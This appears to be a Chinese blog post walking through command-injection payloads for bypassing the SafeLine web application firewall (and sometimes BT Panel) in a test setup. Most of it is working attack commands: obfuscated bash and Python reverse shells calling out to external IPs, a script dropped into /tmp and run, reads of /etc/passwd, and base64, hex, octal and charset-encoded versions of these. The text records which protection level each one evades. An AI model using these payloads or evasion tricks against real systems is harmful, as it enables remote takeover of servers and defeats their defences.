首页 > 其他分享 >bypass waf测试_rce

bypass waf测试_rce

时间:2024-10-25 15:31:09浏览次数:8  
标签:127.0 0.1 waf xx bypass rce 绕过 057 bash

前言

以下验证绕过效果都使用开源雷池waf

知己知彼百战百胜,想bypass waf还是得先了解waf

waf是什么

WAF(WebApplicationFirewall,WEB应用防火墙)会过滤和监测 Web 应用程序与互联网之间的 HTTP/HTTPS 流量,以此来保护 Web 应用程序安全。它通常会保护 Web 应用程序免受各种形式的攻击,例如跨站点脚本 (XSS)、文件包含以及 SQL 注入等。

waf的分类:

硬WAF、云WAF、软WAF、代码层WAF

waf的工作原理:

用户对网站服务器发出请求后,雷池waf先于服务器接收流量,过滤后的流量再转发给服务器。

引用雷池waf手册的一张图

本文使用雷池waf进行实验,链接:https://waf-ce.chaitin.cn/docs/

官方提供语义分析技术解析以及绕过思路:

https://stack.chaitin.com/techblog/detail/80

二、rce绕过尝试

先尝试绕过rce,rce应该好绕一点,特别是linux命令特性比较多

尝试cat /etc/passwd发现拦截

使用未初始化的变量绕过

在Linux中,可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u,它不会报错,而是会返回一个空值。

cat /etc/passwd

在平衡防护时可以绕过,高强度防护时被拦截

cat /etc$u/passwd$u

wget

wget命令在平衡防护和高强度防护都可以绕过

bash反弹shell

被拦截:127.0.0.1 | /bin/bash -i >& /dev/tcp/0.0.0.0/5003 0>&1

高强度防护放行127.0.0.1 | /bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u

但是bash命令反弹shell无反应,考虑可能权限不够,/tmp下有可写可执行权限,写个反弹脚本在tmp

先探测是否存在tmp命令

127.0.0.1 | (cd /tmp && ls)

把反弹命令写入写入tmp目录

127.0.0.1 | echo$u "/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/0.0.0.0$u/5003$u 0>&1$u" > /tmp/2.sh

本地测试加$u的命令写入文件可以执行

被拦截:127.0.0.1 | (cd /tmp && ls -al)

高强度防护绕过127.0.0.1 | (cd /tmp && ls$u -al)

可以看到文件权限添加成功

被拦截:127.0.0.1 | bash$u /tmp$u/2.sh$u

高强度防护绕过127.0.0.1 | /bin$u/bash$u /tmp/2.sh

上线成功

使用$u注意:

发现写入的ip是残缺的,发现我写入的语句是

127.0.0.1 | echo$u "/bin$u/bash$u -i$u >&$u /dev$u/tcp$U/$u121.0.0.0/5003$u 0>&1$u" > /tmp/2.sh

$u在数字或者字符串前面,后面的数字和字符串就会被忽略,其他地方同理,所以$u需要加载一个完整命令的最后

在符号前面加$u,符号是不会被省略的

python反弹shell

暂时没绕过去,看看后面结合其他方法能不能绕过

python$u -c$u 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",5003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

符号绕过

1.通配符

cat

*   代表『 0 个到无穷多个』任意字符
?   代表『一定有一个』任意字符
[ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』
[ - ]   若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字,因为数字的语系编码是连续的!
[^ ]    若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。

高强度防护绕过:127.0.0.1 | /b?n/c?t /???/pass*

有个小坑:c?t或者?at是没办法执行的,因为c?t有好几个命令适用,系统不清楚你想使用哪个,所以需要加上命令的绝对路径/b?n/c?t

反弹shell

高强度防护绕过(宝塔也可以):127.0.0.1 |/b?n/b*h -i >& /dev/tcp/xx.xx.xx.xx/5003 0>&1

2.'连接符

在bash的操作环境中还有一个非常有用的功能,那就是连接符

'c'a't' /'e't'c'/'p'a's's'w'd 每个单引号括起来的字符会被逐一拼接起来

这样看比较直观,命令注意闭合

高强度防护可绕过:127.0.0.1 | 'c'a't' /'e't'c'/'p'a's's'w'd

反弹shell

无法绕过:<font style="color:rgb(18, 18, 18);">/'b'i'n'/b'a's'h' -i >& /d'e'v/t'c'p/162.251.94.247/50000 0>&1</font>

3."连接符

和'连接符同理

高强度防护绕过:127.0.0.1 | "c"a"t" /"e"t"c"/"p"a"s"s"w"d

反弹shell

无法绕过:/"b"i"n"/b"a"s"h" -i >& /d"e"v/t"c"p/xx.xx.xx.xx/5003 0>&1

4.\转义符

反斜杠(\)在Shell中是转义字符,用来忽略后面字符的特殊含义。然而,当反斜杠出现在普通字母前时(如i、n等),这些字母本身并没有特殊含义,所以反斜杠没有实际作用。每个转义后的字母依然是原来的字母。

绕过失败:127.0.0.1 | c\a\t /\e\t\c/p\a\s\s\w\d

5.$*绕过

c$*at%20/et$*c/p$*as$*s$*wd

字符集编码绕过

修改请求header中的Content-Type去使用不同得字符集编码,例如charset=ibm500,未配置为检测不同编码的恶意负载的 WAF 可能无法将请求识别为恶意请求。

可以使用python进行字符集编码。

import urllib.parse

#s = '127.0.0.1 | python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",5003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\''
# First, encode the string using the appropriate encoding
s = '127.0.0.1 | ls'
try:
    encoded_bytes = s.encode('IBM500')
    # Then, URL encode the resulting bytes
    url_encoded_string = urllib.parse.quote_plus(encoded_bytes)
    print(url_encoded_string)
except Exception as e:
    print(f"An error occurred: {e}")

在发包时payload替换成编码后的payload,且修改content-type,

Content-Type: application/x-www-form-urlencoded; charset=cp875

但是只有部分情况可用

缓冲区溢出绕过

还是被拦截

编码绕过

雷池的编码效果不太行,对宝塔的效果还不错

base64

平衡防护绕过127.0.0.1 | echo 'Y2F0IC9ldGMvcGE=' | b"a"s"e"6"4" -dsswd

反弹shell

平衡防护绕过(宝塔):127.0.0.1 | echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE2Mi4yNTEuOTQuMjQ3LzUwMDAwIDA+JjE=' | b"a"s"e"6"4" -d | sh

绕过宝塔:127.0.0.1 | echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE2Mi4yNTEuOTQuMjQ3LzUwMDAwIDA+JjE=' | b"a"s"e"6"4" -d |$u bash

十六进制

无法绕过:echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e3934372f3530303020303e262031" | xxd -r -p | bash

反弹shell

无法绕过(宝塔可以):127.0.0.1 | echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e39342e3234372f353030303020303e2631"| xxd -r -p | sh

绕过宝塔:127.0.0.1 | echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e39342e3234372f353030303020303e2631"| xxd -r -p |$u bash

八进制

无法绕过:127.0.0.1 | **$(**printf "\143\141\164\040\057\145\164\143\057\160\141\163\163\167\144\012")

反弹shell:

127.0.0.1 | $(printf "\057\142\151\156\057\142\141\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\066\062\056\062\065\061\056\071\064\056\062\064\067\057\065\060\060\060\060\040\060\076\046\061")

绕过宝塔:127.0.0.1 | printf "\057\142\151\156\057\142\141\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\066\062\056\062\065\061\056\071\064\056\062\064\067\057\065\060\060\060\060\040\060\076\046\061"|$u bash

空格绕过

在bash下可以用$IFS、${IFS}、$IFS$9、<、>、<>、%09(在URL上使用较多)、%20(space)

雷池没拦截空格,只能本地测试了

标签:127.0,0.1,waf,xx,bypass,rce,绕过,057,bash
From: https://www.cnblogs.com/xiaoxin07/p/18502670

相关文章

  • 【CodeForces训练记录VP】Codeforces Round 933 (Div. 3)
    https://codeforces.com/contest/1941训练情况50min后罚坐反思C题刚开始思路错了,以为是删字符串最后面,然后漏考虑掉两字符串部分拼接的情况A题直接模拟,求\(a_i+b_j\lek\)的对数。#include<bits/stdc++.h>#defineintlonglongusingnamespacestd;voidsolve......
  • 403bypass问题简析
    就是要打骨折http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect《Java代码审计》http:......
  • RCE绕过正则表达式_1
    正则表达式一些常见方法关于RCE绕过正则表达式的一些常见方法,可以从以下几个方面进行:1.利用特殊字符和编码:通过使用如URL编码、Unicode编码、十六进制编码等,可以绕过一些简单的正则表达式过滤。例如,将空格替换为%09、%0b或$IFS等,或者使用反引号(\`)和单引号(')来绕过对某些特......
  • Codeforces Round 972 (Div. 2)
    CodeforcesRound972(Div.2)总结A#include<bits/stdc++.h>usingnamespacestd;intn;chara[]={'a','e','i','o','u'};voidsolve(){cin>>n;intx=n/5,y=n%5;for(inti=0;i<5;......
  • CodeForces - 788C - 完全背包
    题目表示(x1*a[1]+x2*a[2]+...+xk*a[k])/((x1+x2+...+xk)*1000)=n/1000,可以推出(x1*a[1]+x2*a[2]+...+xk*a[k])=n*(x1+x2+...+xk),进而得出(x1*(a[1]-n)+x2*(a[2]-n)+...+xk*(a[k]-n))=0,这样处理之后就和我之前......
  • JavaWeb合集17-拦截器(Interceptor)和过滤器(Filter)
    十七、拦截器和过滤器在JavaWeb开发中,拦截器(Interceptor)和过滤器(Filter)都是用于在请求处理前后执行某些操作的机制。虽然它们的功能相似,但在实现方式、使用场景和灵活性方面有一些重要的区别。1、拦截器和过滤器的区别及选择1.1拦截器定义:拦截器是Spring框架提供......
  • Codeforces Round 980 (Div. 2)
    CodeforcesRound980(Div.2)总结A简单小学算数题。如果\(b\lea\),直接输出\(a\)。否则,列方程\(a-x=b-2x\),\(x=b-a\),输出\(a-x\),即\(2a-b\)。#include<iostream>#include<cstdio>#include<cstring>#include<algorithm>#include<c......
  • 2024年资源勘探与地下工程技术国际论坛 (REUET 2024) 2024 International Symposium
    @目录一、会议详情二、重要信息三、大会介绍四、出席嘉宾五、征稿主题一、会议详情二、重要信息大会官网:https://ais.cn/u/vEbMBz提交检索:EICompendex、IEEEXplore、Scopus三、大会介绍2024年资源勘探与地下工程技术国际论坛(REUET2024)将作为主会议第六届智能控制......
  • [算法题解] Codeforces round 979 --D. QED's Favorite Permutation
    题目链接:https://codeforces.com/contest/2030/problem/D题目:题解:FavotitePermutation即每个数满足i=p[i];此题中,p数组每次询问后保持不变,s根据询问而改变。因此每次需要进行交换的数的位置是相同的,只需要检验s变更后,操作能否满足交换需求与否。故创建需数组need,预处理nee......
  • Codeforces Round 966 (Div. 3) A - G
    linkvp赛时过了ABD,CE没做出来,唐完了eee感觉自己真的可以退役了A-PrimaryTaskB-SeatinginaBusC-NumericStringTemplate这题很简单,开两个map扫一遍就可以了,但是赛时我只开了一个,然后居然没调出来qwq,降智D-RightLeftWrong很显然的贪心,最左边配对......